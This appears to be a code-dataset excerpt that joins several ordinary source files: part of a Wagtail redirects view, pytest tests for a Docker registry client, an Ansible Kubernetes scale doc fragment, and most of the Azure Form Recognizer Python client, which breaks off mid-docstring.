return render(request, "wagtailredirects/confirm_delete.html", {
'redirect': theredirect,
})
@permission_required('wagtailredirects.add_redirect')
def add(request):
theredirect = models.Redirect()
form_class = REDIRECT_EDIT_HANDLER.get_form_class(models.Redirect)
if request.POST:
form = form_class(request.POST, request.FILES)
if form.is_valid():
theredirect = form.save()
messages.success(request, _("Redirect '{0}' added.").format(theredirect.title), buttons=[
messages.button(reverse('wagtailredirects:edit', args=(theredirect.id,)), _('Edit'))
])
return redirect('wagtailredirects:index')
else:
messages.error(request, _("The redirect could not be created due to errors."))
edit_handler = REDIRECT_EDIT_HANDLER(instance=theredirect, form=form)
else:
form = form_class()
edit_handler = REDIRECT_EDIT_HANDLER(instance=theredirect, form=form)
return render(request, "wagtailredirects/add.html", {
'edit_handler': edit_handler,
})
| bsd-3-clause | 6,852,152,495,657,133,000 | 37.261905 | 129 | 0.675586 | false |
twaugh/docker-registry-client | tests/test_dockerregistryclient.py | 1 | 3833 | from __future__ import absolute_import
from docker_registry_client import DockerRegistryClient
from docker_registry_client.Repository import BaseRepository
import pytest
from requests import HTTPError
from tests.mock_registry import (mock_registry,
mock_v2_registry,
TEST_NAMESPACE,
TEST_REPO,
TEST_NAME,
TEST_TAG)
class TestDockerRegistryClient(object):
@pytest.mark.parametrize('version', [1, 2])
def test_api_version_in_use(self, version):
url = mock_registry(version)
client = DockerRegistryClient(url)
assert client.api_version == version
@pytest.mark.parametrize('version', [1, 2])
def test_namespaces(self, version):
url = mock_registry(version)
client = DockerRegistryClient(url)
assert client.namespaces() == [TEST_NAMESPACE]
@pytest.mark.parametrize('version', [1, 2])
@pytest.mark.parametrize(('repository', 'namespace'), [
(TEST_REPO, None),
(TEST_REPO, TEST_NAMESPACE),
('{0}/{1}'.format(TEST_NAMESPACE, TEST_REPO), None),
])
def test_repository(self, version, repository, namespace):
url = mock_registry(version)
client = DockerRegistryClient(url)
repository = client.repository(repository, namespace=namespace)
assert isinstance(repository, BaseRepository)
@pytest.mark.parametrize('version', [1, 2])
def test_repository_namespace_incorrect(self, version):
url = mock_registry(version)
client = DockerRegistryClient(url)
with pytest.raises(RuntimeError):
client.repository('{0}/{1}'.format(TEST_NAMESPACE, TEST_REPO),
namespace=TEST_NAMESPACE)
@pytest.mark.parametrize('namespace', [TEST_NAMESPACE, None])
@pytest.mark.parametrize('version', [1, 2])
def test_repositories(self, version, namespace):
url = mock_registry(version)
client = DockerRegistryClient(url)
repositories = client.repositories(TEST_NAMESPACE)
assert len(repositories) == 1
assert TEST_NAME in repositories
repository = repositories[TEST_NAME]
assert repository.name == "%s/%s" % (TEST_NAMESPACE, TEST_REPO)
@pytest.mark.parametrize('version', [1, 2])
def test_repository_tags(self, version):
url = mock_registry(version)
client = DockerRegistryClient(url)
repositories = client.repositories(TEST_NAMESPACE)
assert TEST_NAME in repositories
repository = repositories[TEST_NAME]
tags = repository.tags()
assert len(tags) == 1
assert TEST_TAG in tags
def test_repository_manifest(self):
url = mock_v2_registry()
client = DockerRegistryClient(url)
repository = client.repositories()[TEST_NAME]
manifest, digest = repository.manifest(TEST_TAG)
repository.delete_manifest(digest)
@pytest.mark.parametrize(('client_api_version',
'registry_api_version',
'should_succeed'), [
(1, 1, True),
(2, 2, True),
(1, 2, False),
(2, 1, False),
])
def test_api_version(self, client_api_version, registry_api_version,
should_succeed):
url = mock_registry(registry_api_version)
if should_succeed:
client = DockerRegistryClient(url, api_version=client_api_version)
assert client.api_version == client_api_version
else:
with pytest.raises(HTTPError):
client = DockerRegistryClient(url,
api_version=client_api_version)
client.refresh()
| apache-2.0 | 8,955,497,881,568,592,000 | 39.347368 | 78 | 0.603183 | false |
sestrella/ansible | lib/ansible/plugins/doc_fragments/k8s_scale_options.py | 41 | 1314 | # -*- coding: utf-8 -*-
# Copyright: (c) 2018, Red Hat | Ansible
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
# Options used by scale modules.
class ModuleDocFragment(object):
DOCUMENTATION = r'''
options:
replicas:
description:
- The desired number of replicas.
type: int
current_replicas:
description:
    - For Deployment, ReplicaSet, Replication Controller, only scale if the number of existing replicas
matches. In the case of a Job, update parallelism only if the current parallelism value matches.
type: int
resource_version:
description:
- Only attempt to scale, if the current object version matches.
type: str
wait:
description:
- For Deployment, ReplicaSet, Replication Controller, wait for the status value of I(ready_replicas) to change
to the number of I(replicas). In the case of a Job, this option is ignored.
type: bool
default: yes
wait_timeout:
description:
- When C(wait) is I(True), the number of seconds to wait for the I(ready_replicas) status to equal I(replicas).
If the status is not reached within the allotted time, an error will result. In the case of a Job, this option
is ignored.
type: int
default: 20
'''
| gpl-3.0 | 719,762,491,698,220,500 | 32.692308 | 118 | 0.684932 | false |
Azure/azure-sdk-for-python | sdk/formrecognizer/azure-ai-formrecognizer/azure/ai/formrecognizer/_form_recognizer_client.py | 1 | 45361 | # coding=utf-8
# ------------------------------------
# Copyright (c) Microsoft Corporation.
# Licensed under the MIT License.
# ------------------------------------
# pylint: disable=protected-access
from typing import Any, IO, Union, List, TYPE_CHECKING
from azure.core.tracing.decorator import distributed_trace
from azure.core.polling.base_polling import LROBasePolling
from ._response_handlers import (
prepare_prebuilt_models,
prepare_content_result,
prepare_form_result,
)
from ._helpers import get_content_type
from ._api_versions import FormRecognizerApiVersion
from ._form_base_client import FormRecognizerClientBase
from ._polling import AnalyzePolling
if TYPE_CHECKING:
from azure.core.polling import LROPoller
from ._models import FormPage, RecognizedForm
class FormRecognizerClient(FormRecognizerClientBase):
"""FormRecognizerClient extracts information from forms and images into structured data.
It is the interface to use for analyzing with prebuilt models (receipts, business cards,
invoices, identity documents), recognizing content/layout from forms, and analyzing
custom forms from trained models. It provides different methods based on inputs from a
URL and inputs from a stream.
:param str endpoint: Supported Cognitive Services endpoints (protocol and hostname,
for example: https://westus2.api.cognitive.microsoft.com).
:param credential: Credentials needed for the client to connect to Azure.
This is an instance of AzureKeyCredential if using an API key or a token
credential from :mod:`azure.identity`.
:type credential: :class:`~azure.core.credentials.AzureKeyCredential` or
:class:`~azure.core.credentials.TokenCredential`
:keyword api_version:
The API version of the service to use for requests. It defaults to the latest service version.
Setting to an older version may result in reduced feature compatibility.
:paramtype api_version: str or ~azure.ai.formrecognizer.FormRecognizerApiVersion
.. admonition:: Example:
.. literalinclude:: ../samples/sample_authentication.py
:start-after: [START create_fr_client_with_key]
:end-before: [END create_fr_client_with_key]
:language: python
:dedent: 8
:caption: Creating the FormRecognizerClient with an endpoint and API key.
.. literalinclude:: ../samples/sample_authentication.py
:start-after: [START create_fr_client_with_aad]
:end-before: [END create_fr_client_with_aad]
:language: python
:dedent: 8
:caption: Creating the FormRecognizerClient with a token credential.
"""
def _prebuilt_callback(
self, raw_response, _, headers
): # pylint: disable=unused-argument
analyze_result = self._deserialize(
self._generated_models.AnalyzeOperationResult, raw_response
)
return prepare_prebuilt_models(analyze_result)
@distributed_trace
def begin_recognize_receipts(self, receipt, **kwargs):
# type: (Union[bytes, IO[bytes]], Any) -> LROPoller[List[RecognizedForm]]
"""Extract field text and semantic values from a given sales receipt.
The input document must be of one of the supported content types - 'application/pdf',
'image/jpeg', 'image/png', 'image/tiff' or 'image/bmp'.
See fields found on a receipt here:
https://aka.ms/formrecognizer/receiptfields
:param receipt: JPEG, PNG, PDF, TIFF, or BMP type file stream or bytes.
:type receipt: bytes or IO[bytes]
:keyword bool include_field_elements:
Whether or not to include all lines per page and field elements such as lines, words,
and selection marks for each form field.
:keyword content_type: Content-type of the body sent to the API. Content-type is
auto-detected, but can be overridden by passing this keyword argument. For options,
see :class:`~azure.ai.formrecognizer.FormContentType`.
:paramtype content_type: str or ~azure.ai.formrecognizer.FormContentType
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword str locale: Locale of the receipt. Supported locales include: en-US, en-AU, en-CA, en-GB,
and en-IN.
:keyword list[str] pages: Custom page numbers for multi-page documents(PDF/TIFF). Input the page numbers
and/or ranges of pages you want to get in the result. For a range of pages, use a hyphen, like
`pages=["1-3", "5-6"]`. Separate each page number or range with a comma.
:return: An instance of an LROPoller. Call `result()` on the poller
object to return a list[:class:`~azure.ai.formrecognizer.RecognizedForm`].
:rtype: ~azure.core.polling.LROPoller[list[~azure.ai.formrecognizer.RecognizedForm]]
:raises ~azure.core.exceptions.HttpResponseError:
.. versionadded:: v2.1
The *locale* and *pages* keyword arguments and support for image/bmp content
.. admonition:: Example:
.. literalinclude:: ../samples/sample_recognize_receipts.py
:start-after: [START recognize_receipts]
:end-before: [END recognize_receipts]
:language: python
:dedent: 8
:caption: Recognize sales receipt fields.
"""
locale = kwargs.pop("locale", None)
pages = kwargs.pop("pages", None)
content_type = kwargs.pop("content_type", None)
include_field_elements = kwargs.pop("include_field_elements", False)
if content_type == "application/json":
raise TypeError(
"Call begin_recognize_receipts_from_url() to analyze a receipt from a URL."
)
cls = kwargs.pop("cls", self._prebuilt_callback)
if content_type is None and kwargs.get("continuation_token", None) is None:
content_type = get_content_type(receipt)
# FIXME: part of this code will be removed once autorest can handle diff mixin
# signatures across API versions
if locale:
if self._api_version == FormRecognizerApiVersion.V2_1:
kwargs.update({"locale": locale})
else:
raise ValueError(
"'locale' is only available for API version V2_1 and up"
)
# FIXME: part of this code will be removed once autorest can handle diff mixin
# signatures across API versions
if pages:
if self._api_version == FormRecognizerApiVersion.V2_1:
kwargs.update({"pages": pages})
else:
raise ValueError(
"'pages' is only available for API version V2_1 and up"
)
return self._client.begin_analyze_receipt_async( # type: ignore
file_stream=receipt,
content_type=content_type,
include_text_details=include_field_elements,
cls=cls,
polling=True,
**kwargs
)
@distributed_trace
def begin_recognize_receipts_from_url(self, receipt_url, **kwargs):
# type: (str, Any) -> LROPoller[List[RecognizedForm]]
"""Extract field text and semantic values from a given sales receipt.
The input document must be the location (URL) of the receipt to be analyzed.
See fields found on a receipt here:
https://aka.ms/formrecognizer/receiptfields
:param str receipt_url: The URL of the receipt to analyze. The input must be a valid, encoded URL
of one of the supported formats: JPEG, PNG, PDF, TIFF, or BMP.
:keyword bool include_field_elements:
Whether or not to include all lines per page and field elements such as lines, words,
and selection marks for each form field.
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword str locale: Locale of the receipt. Supported locales include: en-US, en-AU, en-CA, en-GB,
and en-IN.
:keyword list[str] pages: Custom page numbers for multi-page documents(PDF/TIFF). Input the page numbers
and/or ranges of pages you want to get in the result. For a range of pages, use a hyphen, like
`pages=["1-3", "5-6"]`. Separate each page number or range with a comma.
:return: An instance of an LROPoller. Call `result()` on the poller
object to return a list[:class:`~azure.ai.formrecognizer.RecognizedForm`].
:rtype: ~azure.core.polling.LROPoller[list[~azure.ai.formrecognizer.RecognizedForm]]
:raises ~azure.core.exceptions.HttpResponseError:
.. versionadded:: v2.1
The *locale* and *pages* keyword arguments and support for image/bmp content
.. admonition:: Example:
.. literalinclude:: ../samples/sample_recognize_receipts_from_url.py
:start-after: [START recognize_receipts_from_url]
:end-before: [END recognize_receipts_from_url]
:language: python
:dedent: 8
:caption: Recognize sales receipt fields from a URL.
"""
locale = kwargs.pop("locale", None)
pages = kwargs.pop("pages", None)
include_field_elements = kwargs.pop("include_field_elements", False)
cls = kwargs.pop("cls", self._prebuilt_callback)
# FIXME: part of this code will be removed once autorest can handle diff mixin
# signatures across API versions
if locale:
if self._api_version == FormRecognizerApiVersion.V2_1:
kwargs.update({"locale": locale})
else:
raise ValueError(
"'locale' is only available for API version V2_1 and up"
)
# FIXME: part of this code will be removed once autorest can handle diff mixin
# signatures across API versions
if pages:
if self._api_version == FormRecognizerApiVersion.V2_1:
kwargs.update({"pages": pages})
else:
raise ValueError(
"'pages' is only available for API version V2_1 and up"
)
return self._client.begin_analyze_receipt_async( # type: ignore
file_stream={"source": receipt_url},
include_text_details=include_field_elements,
cls=cls,
polling=True,
**kwargs
)
@distributed_trace
def begin_recognize_business_cards(self, business_card, **kwargs):
# type: (Union[bytes, IO[bytes]], Any) -> LROPoller[List[RecognizedForm]]
"""Extract field text and semantic values from a given business card.
The input document must be of one of the supported content types - 'application/pdf',
'image/jpeg', 'image/png', 'image/tiff' or 'image/bmp'.
See fields found on a business card here:
https://aka.ms/formrecognizer/businesscardfields
:param business_card: JPEG, PNG, PDF, TIFF, or BMP type file stream or bytes.
:type business_card: bytes or IO[bytes]
:keyword str locale: Locale of the business card. Supported locales include: en-US, en-AU, en-CA, en-GB,
and en-IN.
:keyword bool include_field_elements:
Whether or not to include all lines per page and field elements such as lines, words,
and selection marks for each form field.
:keyword list[str] pages: Custom page numbers for multi-page documents(PDF/TIFF). Input the page numbers
and/or ranges of pages you want to get in the result. For a range of pages, use a hyphen, like
`pages=["1-3", "5-6"]`. Separate each page number or range with a comma.
:keyword content_type: Content-type of the body sent to the API. Content-type is
auto-detected, but can be overridden by passing this keyword argument. For options,
see :class:`~azure.ai.formrecognizer.FormContentType`.
:paramtype content_type: str or ~azure.ai.formrecognizer.FormContentType
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:return: An instance of an LROPoller. Call `result()` on the poller
object to return a list[:class:`~azure.ai.formrecognizer.RecognizedForm`].
:rtype: ~azure.core.polling.LROPoller[list[~azure.ai.formrecognizer.RecognizedForm]]
:raises ~azure.core.exceptions.HttpResponseError:
.. versionadded:: v2.1
The *begin_recognize_business_cards* client method
.. admonition:: Example:
.. literalinclude:: ../samples/sample_recognize_business_cards.py
:start-after: [START recognize_business_cards]
:end-before: [END recognize_business_cards]
:language: python
:dedent: 8
:caption: Recognize business cards from a file.
"""
content_type = kwargs.pop("content_type", None)
if content_type == "application/json":
raise TypeError(
"Call begin_recognize_business_cards_from_url() to analyze a business card from a URL."
)
include_field_elements = kwargs.pop("include_field_elements", False)
if content_type is None and kwargs.get("continuation_token", None) is None:
content_type = get_content_type(business_card)
try:
return self._client.begin_analyze_business_card_async( # type: ignore
file_stream=business_card,
content_type=content_type,
include_text_details=include_field_elements,
cls=kwargs.pop("cls", self._prebuilt_callback),
polling=True,
**kwargs
)
except ValueError as e:
if "begin_analyze_business_card_async" in str(e):
raise ValueError(
"Method 'begin_recognize_business_cards' is only available for API version V2_1 and up"
)
raise e
@distributed_trace
def begin_recognize_business_cards_from_url(self, business_card_url, **kwargs):
# type: (str, Any) -> LROPoller[List[RecognizedForm]]
"""Extract field text and semantic values from a given business card.
The input document must be the location (URL) of the card to be analyzed.
See fields found on a business card here:
https://aka.ms/formrecognizer/businesscardfields
:param str business_card_url: The URL of the business card to analyze. The input must be a valid, encoded URL
of one of the supported formats: JPEG, PNG, PDF, TIFF, or BMP.
:keyword str locale: Locale of the business card. Supported locales include: en-US, en-AU, en-CA, en-GB,
and en-IN.
:keyword bool include_field_elements:
Whether or not to include all lines per page and field elements such as lines, words,
and selection marks for each form field.
:keyword list[str] pages: Custom page numbers for multi-page documents(PDF/TIFF). Input the page numbers
and/or ranges of pages you want to get in the result. For a range of pages, use a hyphen, like
`pages=["1-3", "5-6"]`. Separate each page number or range with a comma.
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:return: An instance of an LROPoller. Call `result()` on the poller
object to return a list[:class:`~azure.ai.formrecognizer.RecognizedForm`].
:rtype: ~azure.core.polling.LROPoller[list[~azure.ai.formrecognizer.RecognizedForm]]
:raises ~azure.core.exceptions.HttpResponseError:
.. versionadded:: v2.1
The *begin_recognize_business_cards_from_url* client method
"""
include_field_elements = kwargs.pop("include_field_elements", False)
try:
return self._client.begin_analyze_business_card_async( # type: ignore
file_stream={"source": business_card_url},
include_text_details=include_field_elements,
cls=kwargs.pop("cls", self._prebuilt_callback),
polling=True,
**kwargs
)
except ValueError as e:
if "begin_analyze_business_card_async" in str(e):
raise ValueError(
"Method 'begin_recognize_business_cards_from_url' is "
"only available for API version V2_1 and up"
)
raise e
@distributed_trace
def begin_recognize_identity_documents(self, identity_document, **kwargs):
# type: (Union[bytes, IO[bytes]], Any) -> LROPoller[List[RecognizedForm]]
"""Extract field text and semantic values from a given identity document.
The input document must be of one of the supported content types - 'application/pdf',
'image/jpeg', 'image/png', 'image/tiff' or 'image/bmp'.
See fields found on an identity document here:
https://aka.ms/formrecognizer/iddocumentfields
:param identity_document: JPEG, PNG, PDF, TIFF, or BMP type file stream or bytes.
:type identity_document: bytes or IO[bytes]
:keyword bool include_field_elements:
Whether or not to include all lines per page and field elements such as lines, words,
and selection marks for each form field.
:keyword content_type: Content-type of the body sent to the API. Content-type is
auto-detected, but can be overridden by passing this keyword argument. For options,
see :class:`~azure.ai.formrecognizer.FormContentType`.
:paramtype content_type: str or ~azure.ai.formrecognizer.FormContentType
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword list[str] pages: Custom page numbers for multi-page documents(PDF/TIFF). Input the page numbers
and/or ranges of pages you want to get in the result. For a range of pages, use a hyphen, like
`pages=["1-3", "5-6"]`. Separate each page number or range with a comma.
:return: An instance of an LROPoller. Call `result()` on the poller
object to return a list[:class:`~azure.ai.formrecognizer.RecognizedForm`].
:rtype: ~azure.core.polling.LROPoller[list[~azure.ai.formrecognizer.RecognizedForm]]
:raises ~azure.core.exceptions.HttpResponseError:
.. versionadded:: v2.1
The *begin_recognize_identity_documents* client method
.. admonition:: Example:
.. literalinclude:: ../samples/sample_recognize_identity_documents.py
:start-after: [START recognize_identity_documents]
:end-before: [END recognize_identity_documents]
:language: python
:dedent: 8
:caption: Recognize identity document fields.
"""
content_type = kwargs.pop("content_type", None)
if content_type == "application/json":
raise TypeError(
"Call begin_recognize_identity_documents_from_url() to analyze an identity document from a URL."
)
if content_type is None and kwargs.get("continuation_token", None) is None:
content_type = get_content_type(identity_document)
include_field_elements = kwargs.pop("include_field_elements", False)
try:
return self._client.begin_analyze_id_document_async( # type: ignore
file_stream=identity_document,
content_type=content_type,
include_text_details=include_field_elements,
cls=kwargs.pop("cls", self._prebuilt_callback),
polling=True,
**kwargs
)
except ValueError as e:
if "begin_analyze_id_document_async" in str(e):
raise ValueError(
"Method 'begin_recognize_identity_documents' is only available for API version V2_1 and up"
)
raise e
@distributed_trace
def begin_recognize_identity_documents_from_url(
self, identity_document_url, **kwargs
):
# type: (str, Any) -> LROPoller[List[RecognizedForm]]
"""Extract field text and semantic values from a given identity document.
The input document must be the location (URL) of the identity document to be analyzed.
See fields found on an identity document here:
https://aka.ms/formrecognizer/iddocumentfields
:param str identity_document_url: The URL of the identity document to analyze.
The input must be a valid, encoded URL of one of the supported formats: JPEG, PNG, PDF, TIFF, or BMP.
:keyword bool include_field_elements:
Whether or not to include all lines per page and field elements such as lines, words,
and selection marks for each form field.
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword list[str] pages: Custom page numbers for multi-page documents(PDF/TIFF). Input the page numbers
and/or ranges of pages you want to get in the result. For a range of pages, use a hyphen, like
`pages=["1-3", "5-6"]`. Separate each page number or range with a comma.
:return: An instance of an LROPoller. Call `result()` on the poller
object to return a list[:class:`~azure.ai.formrecognizer.RecognizedForm`].
:rtype: ~azure.core.polling.LROPoller[list[~azure.ai.formrecognizer.RecognizedForm]]
:raises ~azure.core.exceptions.HttpResponseError:
.. versionadded:: v2.1
The *begin_recognize_identity_documents_from_url* client method
"""
include_field_elements = kwargs.pop("include_field_elements", False)
try:
return self._client.begin_analyze_id_document_async( # type: ignore
file_stream={"source": identity_document_url},
include_text_details=include_field_elements,
cls=kwargs.pop("cls", self._prebuilt_callback),
polling=True,
**kwargs
)
except ValueError as e:
if "begin_analyze_id_document_async" in str(e):
raise ValueError(
"Method 'begin_recognize_identity_documents_from_url' is "
"only available for API version V2_1 and up"
)
raise e
@distributed_trace
def begin_recognize_invoices(self, invoice, **kwargs):
# type: (Union[bytes, IO[bytes]], Any) -> LROPoller[List[RecognizedForm]]
"""Extract field text and semantic values from a given invoice.
The input document must be of one of the supported content types - 'application/pdf',
'image/jpeg', 'image/png', 'image/tiff' or 'image/bmp'.
See fields found on a invoice here:
https://aka.ms/formrecognizer/invoicefields
:param invoice: JPEG, PNG, PDF, TIFF, or BMP type file stream or bytes.
:type invoice: bytes or IO[bytes]
:keyword str locale: Locale of the invoice. Supported locales include: en-US
:keyword bool include_field_elements:
Whether or not to include all lines per page and field elements such as lines, words,
and selection marks for each form field.
:keyword list[str] pages: Custom page numbers for multi-page documents(PDF/TIFF). Input the page numbers
and/or ranges of pages you want to get in the result. For a range of pages, use a hyphen, like
`pages=["1-3", "5-6"]`. Separate each page number or range with a comma.
:keyword content_type: Content-type of the body sent to the API. Content-type is
auto-detected, but can be overridden by passing this keyword argument. For options,
see :class:`~azure.ai.formrecognizer.FormContentType`.
:paramtype content_type: str or ~azure.ai.formrecognizer.FormContentType
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:return: An instance of an LROPoller. Call `result()` on the poller
object to return a list[:class:`~azure.ai.formrecognizer.RecognizedForm`].
:rtype: ~azure.core.polling.LROPoller[list[~azure.ai.formrecognizer.RecognizedForm]]
:raises ~azure.core.exceptions.HttpResponseError:
.. versionadded:: v2.1
The *begin_recognize_invoices* client method
.. admonition:: Example:
.. literalinclude:: ../samples/sample_recognize_invoices.py
:start-after: [START recognize_invoices]
:end-before: [END recognize_invoices]
:language: python
:dedent: 8
:caption: Recognize invoices from a file.
"""
content_type = kwargs.pop("content_type", None)
if content_type == "application/json":
raise TypeError(
"Call begin_recognize_invoice_from_url() to analyze an invoice from a URL."
)
include_field_elements = kwargs.pop("include_field_elements", False)
if content_type is None and kwargs.get("continuation_token", None) is None:
content_type = get_content_type(invoice)
try:
return self._client.begin_analyze_invoice_async( # type: ignore
file_stream=invoice,
content_type=content_type,
include_text_details=include_field_elements,
cls=kwargs.pop("cls", self._prebuilt_callback),
polling=True,
**kwargs
)
except ValueError as e:
if "begin_analyze_invoice_async" in str(e):
raise ValueError(
"Method 'begin_recognize_invoices' is only available for API version V2_1 and up"
)
raise e
@distributed_trace
def begin_recognize_invoices_from_url(self, invoice_url, **kwargs):
# type: (str, Any) -> LROPoller[List[RecognizedForm]]
"""Extract field text and semantic values from a given invoice.
The input document must be the location (URL) of the invoice to be analyzed.
        See fields found on an invoice here:
https://aka.ms/formrecognizer/invoicefields
:param str invoice_url: The URL of the invoice to analyze. The input must be a valid, encoded URL
of one of the supported formats: JPEG, PNG, PDF, TIFF, or BMP.
:keyword str locale: Locale of the invoice. Supported locales include: en-US
:keyword bool include_field_elements:
Whether or not to include all lines per page and field elements such as lines, words,
and selection marks for each form field.
:keyword list[str] pages: Custom page numbers for multi-page documents(PDF/TIFF). Input the page numbers
and/or ranges of pages you want to get in the result. For a range of pages, use a hyphen, like
`pages=["1-3", "5-6"]`. Separate each page number or range with a comma.
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:return: An instance of an LROPoller. Call `result()` on the poller
object to return a list[:class:`~azure.ai.formrecognizer.RecognizedForm`].
:rtype: ~azure.core.polling.LROPoller[list[~azure.ai.formrecognizer.RecognizedForm]]
:raises ~azure.core.exceptions.HttpResponseError:
.. versionadded:: v2.1
The *begin_recognize_invoices_from_url* client method
"""
include_field_elements = kwargs.pop("include_field_elements", False)
try:
return self._client.begin_analyze_invoice_async( # type: ignore
file_stream={"source": invoice_url},
include_text_details=include_field_elements,
cls=kwargs.pop("cls", self._prebuilt_callback),
polling=True,
**kwargs
)
except ValueError as e:
if "begin_analyze_invoice_async" in str(e):
raise ValueError(
"Method 'begin_recognize_invoices_from_url' is "
"only available for API version V2_1 and up"
)
raise e
def _content_callback(
self, raw_response, _, headers
): # pylint: disable=unused-argument
analyze_result = self._deserialize(
self._generated_models.AnalyzeOperationResult, raw_response
)
return prepare_content_result(analyze_result)
@distributed_trace
def begin_recognize_content(self, form, **kwargs):
# type: (Union[bytes, IO[bytes]], Any) -> LROPoller[List[FormPage]]
"""Extract text and content/layout information from a given document.
The input document must be of one of the supported content types - 'application/pdf',
'image/jpeg', 'image/png', 'image/tiff' or 'image/bmp'.
:param form: JPEG, PNG, PDF, TIFF, or BMP type file stream or bytes.
:type form: bytes or IO[bytes]
:keyword list[str] pages: Custom page numbers for multi-page documents(PDF/TIFF). Input the page numbers
and/or ranges of pages you want to get in the result. For a range of pages, use a hyphen, like
`pages=["1-3", "5-6"]`. Separate each page number or range with a comma.
:keyword str language: The BCP-47 language code of the text in the document.
See supported language codes here:
https://docs.microsoft.com/azure/cognitive-services/form-recognizer/language-support.
Content supports auto language identification and multilanguage documents, so only
        provide a language code if you would like to force the document to be processed as
that specific language.
:keyword str reading_order: Reading order algorithm to sort the text lines returned. Supported
reading orders include: basic (default), natural. Set 'basic' to sort lines left to right and top
to bottom, although in some cases proximity is treated with higher priority. Set 'natural' to sort
lines by using positional information to keep nearby lines together.
:keyword content_type: Content-type of the body sent to the API. Content-type is
auto-detected, but can be overridden by passing this keyword argument. For options,
see :class:`~azure.ai.formrecognizer.FormContentType`.
:paramtype content_type: str or ~azure.ai.formrecognizer.FormContentType
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:return: An instance of an LROPoller. Call `result()` on the poller
object to return a list[:class:`~azure.ai.formrecognizer.FormPage`].
:rtype: ~azure.core.polling.LROPoller[list[~azure.ai.formrecognizer.FormPage]]
:raises ~azure.core.exceptions.HttpResponseError:
.. versionadded:: v2.1
The *pages*, *language* and *reading_order* keyword arguments and support for image/bmp content
.. admonition:: Example:
.. literalinclude:: ../samples/sample_recognize_content.py
:start-after: [START recognize_content]
:end-before: [END recognize_content]
:language: python
:dedent: 8
:caption: Recognize text and content/layout information from a form.
"""
pages = kwargs.pop("pages", None)
language = kwargs.pop("language", None)
content_type = kwargs.pop("content_type", None)
reading_order = kwargs.pop("reading_order", None)
if content_type == "application/json":
raise TypeError(
"Call begin_recognize_content_from_url() to analyze a document from a URL."
)
if content_type is None and kwargs.get("continuation_token", None) is None:
content_type = get_content_type(form)
# FIXME: part of this code will be removed once autorest can handle diff mixin
# signatures across API versions
if pages:
if self._api_version == FormRecognizerApiVersion.V2_1:
kwargs.update({"pages": pages})
else:
raise ValueError(
"'pages' is only available for API version V2_1 and up"
)
if reading_order:
if self._api_version == FormRecognizerApiVersion.V2_1:
kwargs.update({"reading_order": reading_order})
else:
raise ValueError(
"'reading_order' is only available for API version V2_1 and up"
)
if language:
if self._api_version == FormRecognizerApiVersion.V2_1:
kwargs.update({"language": language})
else:
raise ValueError(
"'language' is only available for API version V2_1 and up"
)
return self._client.begin_analyze_layout_async( # type: ignore
file_stream=form,
content_type=content_type,
cls=kwargs.pop("cls", self._content_callback),
polling=True,
**kwargs
)
@distributed_trace
def begin_recognize_content_from_url(self, form_url, **kwargs):
# type: (str, Any) -> LROPoller[List[FormPage]]
"""Extract text and layout information from a given document.
The input document must be the location (URL) of the document to be analyzed.
:param str form_url: The URL of the form to analyze. The input must be a valid, encoded URL
of one of the supported formats: JPEG, PNG, PDF, TIFF, or BMP.
:keyword list[str] pages: Custom page numbers for multi-page documents(PDF/TIFF). Input the page numbers
and/or ranges of pages you want to get in the result. For a range of pages, use a hyphen, like
`pages=["1-3", "5-6"]`. Separate each page number or range with a comma.
:keyword str language: The BCP-47 language code of the text in the document.
See supported language codes here:
https://docs.microsoft.com/azure/cognitive-services/form-recognizer/language-support.
Content supports auto language identification and multilanguage documents, so only
        provide a language code if you would like to force the document to be processed as
that specific language.
:keyword str reading_order: Reading order algorithm to sort the text lines returned. Supported
reading orders include: basic (default), natural. Set 'basic' to sort lines left to right and top
to bottom, although in some cases proximity is treated with higher priority. Set 'natural' to sort
lines by using positional information to keep nearby lines together.
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:return: An instance of an LROPoller. Call `result()` on the poller
object to return a list[:class:`~azure.ai.formrecognizer.FormPage`].
:rtype: ~azure.core.polling.LROPoller[list[~azure.ai.formrecognizer.FormPage]]
:raises ~azure.core.exceptions.HttpResponseError:
.. versionadded:: v2.1
The *pages*, *language* and *reading_order* keyword arguments and support for image/bmp content
"""
pages = kwargs.pop("pages", None)
language = kwargs.pop("language", None)
reading_order = kwargs.pop("reading_order", None)
# FIXME: part of this code will be removed once autorest can handle diff mixin
# signatures across API versions
if pages:
if self._api_version == FormRecognizerApiVersion.V2_1:
kwargs.update({"pages": pages})
else:
raise ValueError(
"'pages' is only available for API version V2_1 and up"
)
if reading_order:
if self._api_version == FormRecognizerApiVersion.V2_1:
kwargs.update({"reading_order": reading_order})
else:
raise ValueError(
"'reading_order' is only available for API version V2_1 and up"
)
if language:
if self._api_version == FormRecognizerApiVersion.V2_1:
kwargs.update({"language": language})
else:
raise ValueError(
"'language' is only available for API version V2_1 and up"
)
return self._client.begin_analyze_layout_async( # type: ignore
file_stream={"source": form_url},
cls=kwargs.pop("cls", self._content_callback),
polling=True,
**kwargs
)
@distributed_trace
def begin_recognize_custom_forms(self, model_id, form, **kwargs):
# type: (str, Union[bytes, IO[bytes]], Any) -> LROPoller[List[RecognizedForm]]
"""Analyze a custom form with a model trained with or without labels. The form
to analyze should be of the same type as the forms that were used to train the model.
The input document must be of one of the supported content types - 'application/pdf',
'image/jpeg', 'image/png', 'image/tiff', or 'image/bmp'.
:param str model_id: Custom model identifier.
:param form: JPEG, PNG, PDF, TIFF, or BMP type file stream or bytes.
:type form: bytes or IO[bytes]
:keyword bool include_field_elements:
Whether or not to include all lines per page and field elements such as lines, words,
and selection marks for each form field.
:keyword content_type: Content-type of the body sent to the API. Content-type is
auto-detected, but can be overridden by passing this keyword argument. For options,
see :class:`~azure.ai.formrecognizer.FormContentType`.
:paramtype content_type: str or ~azure.ai.formrecognizer.FormContentType
:keyword list[str] pages: Custom page numbers for multi-page documents(PDF/TIFF). Input the page numbers
and/or ranges of pages you want to get in the result. For a range of pages, use a hyphen, like
`pages=["1-3", "5-6"]`. Separate each page number or range with a comma.
